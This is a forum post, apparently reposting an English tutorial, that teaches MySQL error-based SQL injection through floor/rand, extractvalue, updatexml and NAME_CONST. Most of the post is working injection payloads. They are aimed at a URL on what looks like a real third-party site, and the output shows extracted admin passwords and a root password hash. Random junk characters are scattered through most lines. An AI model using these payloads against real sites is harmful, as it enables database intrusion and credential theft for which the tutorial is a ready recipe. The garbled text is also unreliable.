|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
! a4 P2 Y t0 h3 C首先进行正常查询: mysql> select * from article where id = 1;4 a- o" \4 g9 W6 e7 z5 f% n1 W% V% J
+—-+——-+———+
6 P/ {, Q# G+ q# a* F4 H| id | title | content |
. d/ Z" e A& D8 M- q0 P$ f+—-+——-+———+
( x1 N# y, y3 Y% V3 c/ s| 1 | test | do it |
$ R1 K: L; x- e# L+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
$ q: k4 C* t [3 D5 Y' b; WERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
% a8 f; Q$ D9 [+ \# M例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
" L! b6 ~' N4 U- b# X2 `ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));; R3 H" L& F9 d' Y8 q; X! I
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
$ a* G" d0 C$ ~% T6 H测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–6 i1 S+ ?( p. r6 Y6 D: |" R
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ 7 `+ H6 {/ x% y+ P
* M' q( W; D. Q再收集:
5 F5 d K( y9 `4 @6 Ghttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
c/ h( ]* W/ |- M( m0 S2 ^% `! e1 [3 N7 \4 T& ^6 ]8 C
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’, ]: ~& x; R; z( U& B
. D1 b& `( W! m( M. c" o% ahttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)6 x& k% U9 R, V4 u5 y& s' `6 b
# {, O. d$ M- G3 c) O) l
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
7 I( Z' G9 _9 R$ _5 u* X$ Q, ?; Z p' m7 O& i8 ?8 G
MYSQL高版本报错注入技巧-利用NAME_CONST注入. H b3 X4 C' F' R: C0 e
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
) ?+ s/ o4 W$ ]% N( A" m
; D1 G! v2 _* Z3 I! I- j
7 ]- P* ~8 l* {( g( _( t" K" j3 {9 }" q相关信息
; K. s+ h7 P7 E$ [) ?% S# }, E4 E, Z' B
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.9 O: x1 z$ T) J$ R. H( L6 Q
- Q/ }1 B5 }8 q% k) e" { tCode:/ r. `' o# {8 O( [' T! X
NAME_CONST(DATA, VALUE)
7 n% N- H% A; s$ f8 I1 N9 y" ?1 A$ _9 Y4 d4 Z( U- a
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.$ o1 C7 J9 R! x+ n' H2 J
4 Y; v, \/ l' tSELECT NAME_CONST('TEST', 1)
" c9 Z9 t. S- \# k- c1 z. Z9 ^6 `
8 K3 Y" o3 \% I, h' E+ B. x/ P+ K Y3 }/ i* o/ T6 ?
+ S2 P/ F6 v1 j* V2 E- E
|---------------|7 @+ R+ ` r1 `+ R( i$ ~" Z" e
| TEST | B/ c6 ^/ @) `0 @
| |
- ~$ b7 b" K& @3 ||---------------|
0 z: Z4 ^$ i5 C8 G( \3 @| 1 |0 _) Y" M U4 o/ X8 p) L4 q
| |
; P; h3 Z8 e8 U& H7 F2 z# C|---------------|
a9 \% A1 b) p! a$ c, T
$ r! n6 Z. g) k# N" Q
4 T) |5 ^/ L# B# t. b5 A7 A( G. X, \
4 @ Q7 y& D, S5 d5 p- L V$ y0 y- Bhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const% Y8 C* Y* s* V7 |$ V9 {- w/ e4 [
Intro to MySQL Variables
, q& V, N# w: M4 S8 _3 t" Y0 r/ }
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST. S3 F4 Z$ |. Z
+ a0 [* e5 C8 qCode:
8 V' d& {$ G7 g& ?& H# |1 H4 m* Vhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261: r9 Z; |1 ^ X+ |) |
) ?# L! c M) r6 ]9 O$ N: [
9 m j4 R4 D4 }7 h
* D' X- {$ Z8 \* L* [' g/ x- p2 x/ ^7 H8 n& `& r" U* M
5 E2 Y8 }/ t2 r: A0 J. yCode:- k7 x$ N! |' |( e# f' `
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--0 ^" u9 _3 H+ W. L" y, \/ |, P' _
* E% J1 f4 S; R* F5 O f
9 ~/ b* a4 A4 u1 ?3 O. }, A- y$ cVAR = Your MySQL variable.2 k' ^2 K* t5 b9 @9 {
' ?' w& I. Y* g( Y) v
MySQL 5.1.3 Server System Variables/ {* k6 T s# ~% I& x
[- O% }' t5 ], U" a9 W& ?
Let's try it out on my site..: g, v8 c9 X- A+ q4 X0 F: m' i- p- u/ A) k5 N
/ K" ?7 W" r/ S6 o6 R9 sCode:7 j0 G* k$ ]/ e! y; U# r2 L
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
, C, b2 r l( G
; }2 \1 M8 b$ u; c8 F: x5 XErroruplicate column name '5.0.27-community-nt'
; M" v+ Z5 [ h+ B2 L& X; \1 ] |" |; \. F
! T3 j8 k: X3 E/ `* i( Q# p+ G; Q }
( H6 y! ~% L7 [+ E2 D& ]& \
. }1 Y1 m( D$ F5 L; {6 @6 F9 l! D3 BNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...$ E4 Q7 e# J3 f8 I: {" A
! `3 {, D! E1 W1 Y9 z9 a( V5 WData Extraction( T0 s$ K: m- q7 {
5 z8 }+ M) Q, [Code:
6 w. u# q/ B" O% P1 Q" A* I5 ]; y# i1 c+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
) ?# I. K6 K2 U$ b8 U! `* L2 p3 w! Q# ]6 ~
; \: [' e5 }& M% y0 _ F
We should get a duplicate column 1 error...( x5 x- \1 Z0 A4 K$ H+ k. [4 q7 {. k
1 H2 U0 _ E& N* @) YCode:
7 N: z, c) Y# I7 S8 X2 Ghttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
( w- ~9 h# l1 R9 N! j+ F' T1 m' `* W+ e6 O9 W8 ]% I' q, E
Erroruplicate column name '1
! F; I4 F4 B, F0 [+ d
* V; U$ I3 H, J7 g0 ]# ~
+ h4 f) L+ M/ K+ L7 o+ _7 ?; V% p
3 c0 W9 ^( Q: H$ T. ^& G
) P2 `5 y' ~2 t7 N2 v: W0 k
& c& S k" @' L! I5 N- @" zNow let's get the tables out this bitch..6 O! L; V! l+ M* a$ l. G! W4 A) a
( n4 G' [" C, cCode:
3 B/ m& G% j) s2 M* N7 r( O+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
& X3 E: L) V1 m6 s" _. E5 |& e+ U8 @
\7 P1 Y# H, z$ D( f8 u7 R, _3 R0 \6 q
Let's see if it works here, if it does, we can go on and finish the job.5 }% D3 C5 h& u% q1 A- ?% u$ S
% @0 F7 p. w/ P, V
Code:
( F2 m/ a0 k& J4 hhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--! w( L# L( Q( q! v( }) |0 q1 N1 J9 b
& `. c, J4 G) o
/ `- [$ }& Y8 z! EErroruplicate column name 'com_admanage0 U4 q+ }3 V! Y* @
: w" \ j& D; n
1 y2 _4 l; u' G* Z6 t; Q8 Q4 X9 |$ {: ]2 x* ~
7 G$ ?6 Q0 `1 e% P* ]7 q# m: T, q
" r. d3 X. F* i9 l
, Y2 n0 Q. W+ @
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time. n3 t3 i9 R" M3 r) |4 R% d/ H
% w. G6 j8 x! r0 j. @9 j2 K
Let's get the columns out of the user table..+ i; H2 c# ?; ]- I3 W, r7 u' K
% c0 P* n2 v" z9 {- DCode:) q; B) c# }6 E* i+ O) b
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--/ _5 W* A; G2 M9 E, ]+ W- ?
$ E6 H) F; b/ Q9 J9 g F' I4 G0 @, a+ b6 g5 N( C! x
So mine looks like this, and I get the duplicate column name 'Host'. X/ x, i2 a6 F# C- L U# \: @1 q
" [. G, x& B0 Z) F9 k( l% X* u, @
Code:
$ J/ K8 t, L9 v2 S' x4 `# p2 bhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
7 S% b7 d+ ?0 s
( D1 q+ Z, C' w! p e! MErroruplicate column name 'Host'! F& F v! ?2 V/ B
& U0 B/ u9 @1 p( @; R( s( ]3 z; o8 A: H ~% s: l. q* }
' H# l7 r! h6 k1 _' _
; b! M7 S9 @ t: Q" M9 I
0 {( j7 d# N+ e8 y( Y0 {7 a9 `4 M# R
Woot, time to finish this bitch off.3 u8 {. ?- q8 _8 ~6 f
; m1 j0 A( w- L6 D& o1 Y1 A- UCode:! E* k3 v/ o) g, d, Q# |7 e
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--% V# c: C' H% Z! O
9 |5 J0 r' x6 a0 [
. A# A' M" Y5 NSo mine looks like this...* b. G, k# w, z0 m1 m6 s
9 G+ S+ ?5 m$ m! Z; |9 J
Code:
3 P0 \/ {9 j0 `http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--3 o8 N" c/ Q+ ~) Z! e9 C+ m7 h0 b
$ C1 w. o) d# I, S2 V9 cErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'% m6 g$ o8 x& O: G4 |9 E8 i: K8 r7 S; o
4 U# H3 x# M3 X! L) h. f
6 n% I1 @4 m/ A7 i6 l; U
+ T* V% @. m3 l
7 R3 O7 a! ]: q' a' J3 p: w" C; c- e, [) Z) C6 i8 C* `" G
. `5 G& ]; p1 I
And there we have it, thanks for reading.
+ l- [ E% c' d* i+ O9 s
9 ]: l6 j2 |# L4 }9 G) G: p+ Z |
发表于 2015-11-11 19:03:37
收藏
支持
反对